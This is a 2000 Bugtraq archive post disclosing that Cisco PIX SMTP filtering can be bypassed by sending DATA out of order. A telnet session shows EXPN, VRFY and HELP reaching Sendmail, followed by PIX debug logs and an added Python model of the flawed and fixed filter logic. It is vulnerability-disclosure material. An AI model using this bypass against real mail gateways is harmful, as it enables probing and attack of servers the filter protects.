Bugtraq mailing list archives

Re: Cisco PIX Firewall (smtp content filtering hack) [Finally resolved]


From: "Fabio Pietrosanti (naif)" <fabio () TELEMAIL IT>
Date: Tue, 3 Oct 2000 11:15:25 +0200

Hi,
This is the e-mail I sent to Cisco security-alert.
Today Cisco released 5.2(4), which also fixes this bug ...

The Cisco patch for the "SMTP Content Filtering tricks proposed by
naif () inet it" could be avoided with the "SMTP Content Filtering tricks
proposed by Lincoln Yeoh <lyeoh () pop jaring my>".


The little hack posted on bugtraq by me on "Tue, 19 Sep 2000" works because
the PIX completely disables the sanity check after the "data" command.

Cisco released the new PIX version, 5.2(2), which we installed on our
test PIX.

The Cisco advisory is:

http://www.cisco.com/warp/public/707/PIXfirewallSMTPfilter-pub.shtml

Then I read on bugtraq about a trick from July similar to my advisory:

http://www.securityfocus.com/templates/archive.pike?threads=0&list=1&end=2000-07-09&tid=68903&start=2000-07-03&;

So, 5.2(2) should avoid this problem and SMTP content filtering should
work...

Here is our PIX test:
newpix# sh ver

Cisco Secure PIX Firewall Version 5.2(2)

Compiled on Sun 24-Sep-00 18:59 by morlee

newpix up 19 hours 27 mins

Hardware:   SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB

0: ethernet0: address is 00d0.b790.41a5, irq 11
1: ethernet1: address is 00d0.b790.54d4, irq 10
2: ethernet2: address is 00e0.b601.d289, irq 15
3: ethernet3: address is 00e0.b601.d288, irq 9
4: ethernet4: address is 00e0.b601.d287, irq 11
5: ethernet5: address is 00e0.b601.d286, irq 10

Licensed Features:
Failover:       Enabled
VPN-DES:        Enabled
VPN-3DES:       Enabled
Maximum Interfaces:     6
Cut-through Proxy:      Enabled
Guards:         Enabled
Websense:       Enabled
Throughput:     Unlimited
ISAKMP peers:   Unlimited

And the line regarding fixup in the config is:
fixup protocol smtp 25

===== Here is the session...

<naif@naif> [~] $ telnet  ourtest 25
Trying 10.10.10.2...
Connected to eagletmp.
Escape character is '^]'.
data wow
expn root
vrfy root
help
helo pinco
220 **************************************************2******2000 ******00
*0200 ******
503 Need MAIL command
250 Pinco Pallino <pinco () ourtest ourdomain it>
250 <root () ourtest ourdomain it>
214-This is Sendmail version 8.9.1
214-Topics:
214-    HELO    EHLO    MAIL    RCPT    DATA
214-    RSET    NOOP    QUIT    HELP    VRFY
214-    EXPN    VERB    ETRN    DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214-    sendmail-bugs () sendmail org.
214-For local information send email to Postmaster at your site.
214 End of HELP info
250 ourtest.ourdomain.it Hello [10.10.10.10], pleased to meet you
quit
221 ourtest.ourdomain.it closing connection
Connection closed by foreign host.

#### As you can see we could bypass the "fixup smtp"

===== Here is the Cisco PIX debug output

        tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
        tcp: SYN out rcvd
        tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
        tcp: exiting embyonic
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
        smtp: data command
        smtp: entering data mode
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
        tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
        tcp: TCP MSS changed to 1380
tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
        smtp: quit command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
        smtp_respond: ERR: bad reply code
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)

=====
To Cisco:

Please also check CBAC carefully, because I think it also affects IOS
CBAC inspect.
I'll release the advisory for this new version on bugtraq next week, so
you can release a new PIX version.

On Thu, 21 Sep 2000, Ioannis Migadakis wrote:

This particular vulnerability is not new.

It was posted to BUGTRAQ on 9 Jul 2000 by Lincoln Yeoh with the title
"Out of order SMTP DATA commands incorrectly allow pass-through mode in
some firewall smtp filters/proxies".

The original post (does not say anything about Cisco PIX) can be found at:

http://www.securityfocus.com/templates/archive.pike?threads=0&list=1&end=2000-07-09&tid=68903&start=2000-07-03&

Ioannis Migadakis

naif
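The failure the post describes is a state-machine one: the filter switched into "data mode" on seeing the client's DATA keyword, without waiting to see whether the server actually accepted it with a 354 reply, so everything the client sent afterwards was treated as message body and left uninspected. The following added example (written for this archive page; it is neither Cisco's code nor code from the original post) models both behaviours over a constructed replay of the session shown above and of a normal message, so the difference can be checked. The allow-list of commands is an assumption modelled on the RFC 821 minimum set; the hostnames and reply text are copied from the transcript, and the second session is invented for the comparison.

```python
"""
Two minimal models of an SMTP command filter ("mail guard"):

  keyword_only_inspector  - the flawed behaviour described in the post:
                            inspection stops as soon as the client sends
                            DATA, whatever the server answers.
  reply_aware_inspector   - the corrected behaviour: data mode begins only
                            when the server accepts DATA with a 354 reply
                            and ends at the lone "." terminator.

Both return the list of client command verbs they would have blocked.
"""

# Assumed allow-list (RFC 821 minimum command set); not taken from the post.
ALLOWED = {"HELO", "MAIL", "RCPT", "DATA", "RSET", "NOOP", "QUIT"}

# Constructed replay of the session in the post, with each server reply
# placed directly after the client line it answers.
SESSION = [
    ("C", "data wow"),
    ("S", "503 Need MAIL command"),
    ("C", "expn root"),
    ("S", "250 Pinco Pallino <pinco@ourtest.ourdomain.it>"),
    ("C", "vrfy root"),
    ("S", "250 <root@ourtest.ourdomain.it>"),
    ("C", "help"),
    ("S", "214 End of HELP info"),
    ("C", "helo pinco"),
    ("S", "250 ourtest.ourdomain.it Hello [10.10.10.10], pleased to meet you"),
    ("C", "quit"),
    ("S", "221 ourtest.ourdomain.it closing connection"),
]

# Constructed ordinary delivery: DATA is accepted with 354, and a line that
# happens to look like a command sits inside the message body.
LEGIT_SESSION = [
    ("C", "helo pinco"),
    ("S", "250 ourtest.ourdomain.it Hello [10.10.10.10], pleased to meet you"),
    ("C", "mail from:<pinco@ourtest.ourdomain.it>"),
    ("S", "250 Sender ok"),
    ("C", "rcpt to:<root@ourtest.ourdomain.it>"),
    ("S", "250 Recipient ok"),
    ("C", "data"),
    ("S", "354 Enter mail, end with \".\" on a line by itself"),
    ("C", "Subject: test"),
    ("C", ""),
    ("C", "expn root"),
    ("C", "."),
    ("S", "250 Message accepted for delivery"),
    ("C", "quit"),
    ("S", "221 ourtest.ourdomain.it closing connection"),
]


def _verb(line):
    """First token of a client line, upper-cased; empty for a blank line."""
    parts = line.split(maxsplit=1)
    return parts[0].upper() if parts else ""


def keyword_only_inspector(session):
    """Flawed model: the client's DATA keyword alone switches off inspection."""
    in_data = False
    blocked = []
    for who, line in session:
        if who != "C" or in_data:
            continue  # server replies are ignored; body is never inspected
        verb = _verb(line)
        if verb == "DATA":
            in_data = True  # no check that the server agreed
        elif verb not in ALLOWED:
            blocked.append(verb)
    return blocked


def reply_aware_inspector(session):
    """Corrected model: data mode requires the server's 354 reply to DATA."""
    in_data = False
    awaiting_data_reply = False
    blocked = []
    for who, line in session:
        if who == "C":
            if in_data:
                if line == ".":
                    in_data = False  # end of message body, resume inspection
                continue
            verb = _verb(line)
            if verb == "DATA":
                awaiting_data_reply = True  # decide after the server answers
            elif verb not in ALLOWED:
                blocked.append(verb)
        else:
            if awaiting_data_reply:
                in_data = line[:3] == "354"  # 503 etc. keeps us inspecting
                awaiting_data_reply = False
    return blocked


if __name__ == "__main__":
    print("keyword-only, bypass session:", keyword_only_inspector(SESSION))
    print("reply-aware,  bypass session:", reply_aware_inspector(SESSION))
    print("reply-aware,  normal session:", reply_aware_inspector(LEGIT_SESSION))
```

On the replayed session the keyword-only model blocks nothing, which matches the transcript in the post where EXPN, VRFY and HELP all reached Sendmail; the reply-aware model blocks all three because the server's 503 meant data mode never started. On the ordinary delivery both models let the message through, and the reply-aware one still treats the "expn root" inside the body as body rather than as a command, so the fix does not break normal mail.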